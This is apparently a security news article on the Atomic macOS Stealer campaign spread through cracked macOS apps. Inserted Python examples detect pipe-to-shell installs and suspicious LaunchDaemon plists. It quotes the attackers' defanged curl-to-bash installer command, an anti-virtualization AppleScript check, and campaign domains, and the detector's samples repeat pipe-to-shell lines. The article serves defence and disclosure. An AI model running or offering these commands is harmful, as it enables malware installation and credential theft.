
Atomic Stealer Disguised as Cracked Software Attacking macOS Users

Published September 11, 2025


A malware campaign targeting macOS users has been identified, leveraging the demand for free software to distribute the Atomic macOS Stealer (AMOS). The malware is disguised as cracked versions of popular applications, leading users to inadvertently compromise their systems.

AMOS challenges the perception of macOS security, as it collects sensitive information such as browser credentials, cryptocurrency wallets, Telegram conversations, VPN configurations, keychain data, Apple Notes, and various document files. This poses a significant risk both to individual users and enterprise environments, where compromised credentials could result in broader security breaches.

Trend Micro researchers discovered this campaign through their Managed Detection and Response services, highlighting the malware’s use of social engineering techniques to bypass traditional security measures. The primary distribution vector is websites like haxmac.cc, which distribute cracked macOS applications.

The malware employs a complex distribution strategy involving rotating domains, including dtxxbz1jq070725p93[.]cfd, goipbp9080425d4[.]cfd, and im9ov070725iqu[.]cfd. These redirect victims to landing pages on ekochist.com, misshon.com, and toutentris.com, where two main installation methods are presented.

Terminal-Based Installation and Persistence Mechanisms

The malware’s installation often involves instructing users to execute commands in the macOS Terminal, effectively bypassing Apple’s Gatekeeper security feature. Users are prompted to execute commands such as:

curl -fsSL https://goatramz[.]com/get4/install[.]sh | bash

This command downloads and runs an installation script that performs several operations, including downloading an AppleScript file named “update,” which conducts anti-virtualization checks:

-- Query the hardware memory profile and look for hypervisor vendor strings
set memData to do shell script "system_profiler SPMemoryDataType"
if memData contains "QEMU" or memData contains "VMware" then
    -- Running inside a VM or analysis sandbox: signal the caller to abort
    set exitCode to 100
else
    set exitCode to 0
end if
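The installation vector above (a download tool piped straight into a shell) leaves a recognisable trace in shell history and in process-creation telemetry. The following is an added detection example, not code from the article or from Trend Micro: it scans zsh-style history lines for a curl or wget invocation whose output is piped into a shell. The sample history lines are constructed for illustration, with the flagged line mirroring the defanged command quoted above.

```python
import re
from typing import List

# A download tool whose output is piped directly into a shell interpreter:
# matches "curl ... | bash", "curl ... | sudo sh", "wget -qO- ... | zsh", etc.
PIPE_TO_SHELL = re.compile(
    r"\b(curl|wget)\b[^|\n]*\|\s*(?:sudo\s+)?(?:ba|z|da|k)?sh\b"
)

# Constructed sample zsh EXTENDED_HISTORY lines (not real data). Line 2 mirrors
# the defanged installer command quoted in the article; the others are benign
# uses of curl/wget that must not be flagged.
SAMPLE_HISTORY = """\
: 1757500000:0;ls -la ~/Downloads
: 1757500030:0;curl -fsSL https://goatramz[.]com/get4/install[.]sh | bash
: 1757500090:0;curl -o ~/Downloads/file.dmg https://example.test/file.dmg
: 1757500120:0;wget -qO- https://example.test/setup.sh | sudo sh
: 1757500150:0;echo "curl is installed" | grep curl
"""


def strip_zsh_prefix(line: str) -> str:
    """Drop the ': <epoch>:<duration>;' prefix zsh adds with EXTENDED_HISTORY."""
    if line.startswith(": ") and ";" in line:
        return line.split(";", 1)[1]
    return line


def find_pipe_to_shell(history_text: str) -> List[str]:
    """Return every command in history_text that pipes curl/wget into a shell."""
    hits = []
    for raw in history_text.splitlines():
        cmd = strip_zsh_prefix(raw).strip()
        if PIPE_TO_SHELL.search(cmd):
            hits.append(cmd)
    return hits


if __name__ == "__main__":
    for hit in find_pipe_to_shell(SAMPLE_HISTORY):
        print("suspicious:", hit)
```

Pointed at a real `~/.zsh_history` or `~/.bash_history`, the same function gives a quick triage of whether a user ran a pipe-to-shell installer; in an EDR, the equivalent rule fires on a `bash`/`sh` process whose standard input is a pipe from `curl`.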

Persistence is established through a multi-component system involving a primary stealer binary (.helper) for data collection, a monitoring script (.agent) to detect user login sessions, and a LaunchDaemon configuration file (com.finder.helper.plist) to ensure the malware survives system reboots.

The persistence mechanism involves the .agent script monitoring active user sessions and executing the .helper binary accordingly. This setup ensures continuous operation while remaining discreet.
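The persistence layout described above (an Apple-sounding LaunchDaemon label whose job runs a hidden dotfile from a user-writable directory) is the kind of thing a launchd audit can flag. The following is an added example, not code from the article or from the malware: it parses launchd job plists with the standard-library `plistlib` and reports heuristics such as a hidden executable name, a program under a user-writable path, and a label that mimics Apple naming while pointing outside Apple-owned paths. The two sample plists are constructed; the `/Users/victim/.agent` path is an assumption for illustration, and only the label `com.finder.helper` comes from the article.

```python
import os
import plistlib
from typing import Dict, List

APPLE_OWNED_PATHS = ("/System/", "/usr/", "/Library/Apple/")
USER_WRITABLE_PATHS = ("/Users/", "/tmp/", "/private/tmp/", "/var/tmp/")

# Constructed sample modelled on the com.finder.helper label from the article;
# the executable path is an illustrative assumption.
SUSPECT_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
    <key>Label</key><string>com.finder.helper</string>
    <key>ProgramArguments</key>
    <array><string>/Users/victim/.agent</string></array>
    <key>RunAtLoad</key><true/>
    <key>KeepAlive</key><true/>
</dict>
</plist>
"""

# Constructed benign job: vendor label, executable under /Library.
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
    <key>Label</key><string>com.example.backupagent</string>
    <key>ProgramArguments</key>
    <array><string>/Library/Application Support/Backup/backupd</string></array>
    <key>RunAtLoad</key><true/>
</dict>
</plist>
"""


def program_path(job: dict) -> str:
    """launchd jobs name their executable via ProgramArguments[0] or Program."""
    args = job.get("ProgramArguments")
    if args:
        return args[0]
    return job.get("Program", "")


def audit_launchd_job(data: bytes) -> List[str]:
    """Return a list of human-readable reasons a launchd plist looks suspicious."""
    job = plistlib.loads(data)
    reasons = []
    path = program_path(job)
    label = job.get("Label", "")

    # Hidden dotfile executables (.helper, .agent) are rare in legitimate jobs.
    if os.path.basename(path).startswith("."):
        reasons.append(f"hidden dotfile executable: {path}")

    # System daemons should not run code from a user-writable location.
    if path.startswith(USER_WRITABLE_PATHS):
        reasons.append(f"executable under user-writable path: {path}")

    # Apple-looking labels (com.apple.*, *.finder.*) pointing outside Apple paths.
    parts = label.lower().split(".")
    if ("apple" in parts or "finder" in parts) and not path.startswith(APPLE_OWNED_PATHS):
        reasons.append(f"Apple-looking label {label!r} runs non-Apple path {path}")

    # Auto-start plus auto-restart on an already-suspicious job: persistence intent.
    if reasons and job.get("RunAtLoad") and job.get("KeepAlive"):
        reasons.append("RunAtLoad+KeepAlive on a suspicious job (survives reboot/kill)")
    return reasons


def audit_directory(dirpath: str) -> Dict[str, List[str]]:
    """Audit every .plist in a launchd directory; unreadable files are skipped."""
    findings = {}
    if not os.path.isdir(dirpath):
        return findings
    for name in sorted(os.listdir(dirpath)):
        if not name.endswith(".plist"):
            continue
        full = os.path.join(dirpath, name)
        try:
            with open(full, "rb") as fh:
                reasons = audit_launchd_job(fh.read())
        except (OSError, plistlib.InvalidFileException, ValueError):
            continue
        if reasons:
            findings[full] = reasons
    return findings


if __name__ == "__main__":
    for d in ("/Library/LaunchDaemons", "/Library/LaunchAgents",
              os.path.expanduser("~/Library/LaunchAgents")):
        for path, reasons in audit_directory(d).items():
            print(path)
            for r in reasons:
                print("   -", r)
```

Run on a macOS host it walks the system and per-user launchd directories; the heuristics are deliberately conservative (a job must hit at least one concrete indicator before the RunAtLoad/KeepAlive combination counts against it), so a benign vendor daemon under `/Library` produces no finding.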

Data exfiltration is achieved by sending compressed ZIP archives via HTTP POST requests to command-and-control servers, with custom headers for unique identification of each infected system. The malware’s capabilities, combined with its evasion and persistence strategies, present a significant threat to macOS users acquiring software from unreliable sources.

Written By
Angela Waters
